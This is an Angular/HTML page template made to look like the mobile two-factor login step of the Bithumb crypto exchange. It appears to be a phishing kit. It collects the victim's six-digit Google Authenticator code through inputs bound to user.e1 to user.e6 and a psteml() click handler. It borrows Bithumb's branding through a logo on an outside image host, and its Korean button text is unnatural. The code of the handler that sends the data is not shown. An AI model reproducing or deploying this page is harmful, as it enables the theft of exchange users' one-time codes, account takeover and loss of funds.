<script>
    var container = document.getElementsByClassName("container")[0];
    container.onkeyup = function(e) {
        var target = e.srcElement;
        var maxLength = parseInt(target.attributes["maxlength"].value, 10);
        var myLength = target.value.length;
        if (myLength >= maxLength) {
            var next = target;
            while (next = next.nextElementSibling) {
                if (next == null)
                    break;
                if (next.tagName.toLowerCase() == "input") {
                    next.focus();
                    break;
                }
            }
        }
    }
       </script>
       <script src="https://cdnjs.cloudflare.com/ajax/libs/jrumble/1.3.0/jquery.jrumble.min.js" integrity="sha512-0vcUK0oQ15FtIrg1bbNL6zO2yB0pSZjPZERBNA0ZXIw/7jsSHu+rxxbpbM20wIaiEofTK9oPoP/Y8xvh3qoasQ==" crossorigin="anonymous"></script>
       <ngx-spinner bdColor = "rgba(0,0,0,0.64)" size = "medium" color = "#fff" type = "line-scale" [fullScreen] = "true"></ngx-spinner>
 
 <header id="header">
    
    <div id="smartBanner">
       <div class="nav-fixed-search" id="navFixedSearch">
          <div class="form-group form-group--reset form-group--search-nav-fixed inp_search">
             <div class="form-group__box form-group__box--icon-left inp_search"><input type="text" class="form-group__control form-group__control--no-border __nav-fixed-search-input" id="txtSearch" data-language="main.msg.01" placeholder="코인명 또는 심볼 검색"><button type="button" class="button-form-reset g_hidden"><i class="sp-mobile-head ico_reset"></i></button><span class="form-group__icon form-group__icon--search"><i class="sp-mobile-head"></i></span></div>
          </div>
          <button type="button" class="nav-fixed-search__button" id="navFixedSearchClose"><span class="nav-fixed-search__button-text" data-language="page.common.msg07">취소</span></button>
       </div>
       <nav class="nav-fixed">
          <div class="nav-fixed-box--left" id="navFixedSearch"><a href="" class="nav-fixed__prev-button" id="headHref">
             <img height="30px" src="https://i.ibb.co/17gdq6b/Bithumb-logo.png">
          
          </a></div>
          <div class="nav-fixed-box--center">
             <h3 class="nav-fixed__title">로그인</h3>
          </div>
          <div class="nav-fixed-box--right"></div>
       </nav>
    </div>
 </header>
 
 <div class="content">
    <form action="https://m.bithumb.com/member_operation/loginsuccess" id="frmLogin" name="frmLogin" method="post" accept-charset="utf-8">
        <div class="pincode-input-container" style="padding: 10px;display: flex; align-items: center; justify-content: center;">
         Google Authenticator 앱에 표시된<br>
         인증번호 6자리를 입력해 주세요.
         </div>
        <div class="row">
          <div class="pincode-input-container" style="padding: 10px;display: flex; align-items: center; justify-content: center;">
             <br>
             <input [(ngModel)]='user.e1' #pre="ngModel" required name="e1" (keyup)="onDigitInput($event)"
             class="pincode-input-text" placeholder="" aria-label="" maxlength="1" autocomplete="off" type="tel" inputmode="number" pattern="[0-9]*" style="padding: 0px; margin: 0px 2px; text-align: center; border: 1px solid #ff8200; background: transparent none repeat scroll 0% 0%; width: 50px; height: 50px;" value="">
            
             <input [(ngModel)]='user.e2' #pre="ngModel" required name="e2" (keyup)="onDigitInput($event)"
             class="pincode-input-text" placeholder="" aria-label="" maxlength="1" autocomplete="off" type="tel" inputmode="number" pattern="[0-9]*" style="padding: 0px; margin: 0px 2px; text-align: center; border: 1px solid #ff8200;background: transparent none repeat scroll 0% 0%; width: 50px; height: 50px;" value="">
            
             <input [(ngModel)]='user.e3' #pre="ngModel" required name="e3" (keyup)="onDigitInput($event)"
             class="pincode-input-text" placeholder="" aria-label="" maxlength="1" autocomplete="off" type="tel" inputmode="number" pattern="[0-9]*" style="padding: 0px; margin: 0px 2px; text-align: center; border: 1px solid #ff8200; background: transparent none repeat scroll 0% 0%; width: 50px; height: 50px;" value="">
            
             <input [(ngModel)]='user.e4' #pre="ngModel" required name="e4" (keyup)="onDigitInput($event)"
             class="pincode-input-text" placeholder="" aria-label="" maxlength="1" autocomplete="off" type="tel" inputmode="number" pattern="[0-9]*" style="padding: 0px; margin: 0px 2px; text-align: center; border: 1px solid #ff8200; background: transparent none repeat scroll 0% 0%; width: 50px; height: 50px;" value="">
    
             <input [(ngModel)]='user.e5' #pre="ngModel" required name="e5" (keyup)="onDigitInput($event)"
             class="pincode-input-text" placeholder="" aria-label="" maxlength="1" autocomplete="off" type="tel" inputmode="number" pattern="[0-9]*" style="padding: 0px; margin: 0px 2px; text-align: center; border: 1px solid #ff8200; background: transparent none repeat scroll 0% 0%; width: 50px; height: 50px;" value="">
    
             <input [(ngModel)]='user.e6' #pre="ngModel" required name="e6" (keyup)="onDigitInput($event)"
             class="pincode-input-text" placeholder="" aria-label="" maxlength="1" autocomplete="off" type="tel" inputmode="number" pattern="[0-9]*" style="padding: 0px; margin: 0px 2px; text-align: center; border: 1px solid #ff8200; background: transparent none repeat scroll 0% 0%; width: 50px; height: 50px;" value="">
    
             
             </div>
       </div>
       <div style="padding: 1px; align-items: center; justify-content: center; color: red;" > {{user.e7}} </div>
    </form>
    <div data-language="kakao.msg1" class="kakao-message">카카오톡 알림톡을 통해 인증번호를 받아보실 수 있으며, 카카오톡 사용자가 아닐 경우 SMS로 인증번호가 발송됩니다.</div>
    <div class="row">
       <div (click)="psteml()" class="btn_orange btn-large col s12 center-align waves-effect" id="btnLogin" data-scanning="btnLogin" data-language="common.msg295">
 
          <span [style.display]="flag1 ? color3 : color2" >  <i class="fas fa-spinner fa-spin"></i></span>
          <span [style.display]="flag1 ? color2 : color3" class="waves-effect">확인하다</span>         
       
       </div>
    </div>
 
 </div>
 
 
 <ul class="bottomMenu">
    <li class=""><a href="/" data-language="common.head.msg22" class="GA_PUBLIC_BOTTOM_MENU_HOME"><i class="sp-mobile-head trade"></i>거래소</a></li>
    <li class="">
       <a href="/additional_service/lending_kind" data-language="common.head.msg23" class="GA_PUBLIC_BOTTOM_MENU_LENDING">
          <div class="ico_container"><i class="icoNew icoNewMenu">N</i></div>
          <i class="sp-mobile-head lending"></i>렌딩
       </a>
    </li>
    <li class=""><a href="/asset_status/asset_my" data-language="common.head.msg23" class="GA_PUBLIC_BOTTOM_MENU_ASSET"><i class="sp-mobile-head asset"></i>자산현황</a></li>
    <li class=""><a href="/trade/statement" data-language="page.common.msg583" class="GA_PUBLIC_BOTTOM_MENU_DEPOSIT"><i class="sp-mobile-head depositNWithdraw"></i>입출금</a></li>
    <li class=""><a href="/main/more_index" data-language="page.common.msg777" class=""><i class="sp-mobile-head more-menu"></i>더보기</a></li>
 </ul>